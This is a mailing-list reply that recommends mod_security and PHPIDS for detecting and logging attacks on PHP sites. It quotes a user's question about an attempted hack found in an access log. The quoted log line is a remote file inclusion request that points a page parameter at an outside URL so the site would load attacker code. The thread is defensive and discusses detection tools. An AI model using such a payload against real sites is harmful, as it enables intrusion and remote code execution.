mod_Security -http://www.modsecurity.org/
Allows you to at the server level detect and log hack attempts
Note: it's default ruleset can be very aggressive against some CMS
applications, leading to adding exceptions to the ruleset for normal
functionality(or more accurately, it leads to people posting on forums
saying "help, my web site suddenly stopped working today when you do X"
only to discover their web provider enabled mod_security and they need
an exception to the ruleset to function)
PHPIDS - http://php-ids.org/
Instead of functioning at the web server level, this functions at the
PHP level and gives you a much easier ability to modify your actions
using PHP. You can use the auto-prepend PHP function to add your IDS
script to every PHP script file automatically at runtime if you wish.
[EMAIL PROTECTED] wrote:
Hello NYPHP,
I found the following attempted hack in the access log on one of my sites:
"GET /index.php?Mode=http://badguyurl.ru/index.html?";
In this case, the hacker didn't gain access to the site because a
database script failed instead.
I would like to be more proactive with trapping this and sending the
results of the trap back to me so I can track and ban IP addresses
etc.
I have a procedure that I hacked for previous exploits but am
interested now in other options that I may not have used previously.
_______________________________________________
New York PHP Community Talk Mailing List
http://lists.nyphp.org/mailman/listinfo/talk
NYPHPCon 2006 Presentations Online
http://www.nyphpcon.com
Show Your Participation in New York PHP
http://www.nyphp.org/show_participation.php
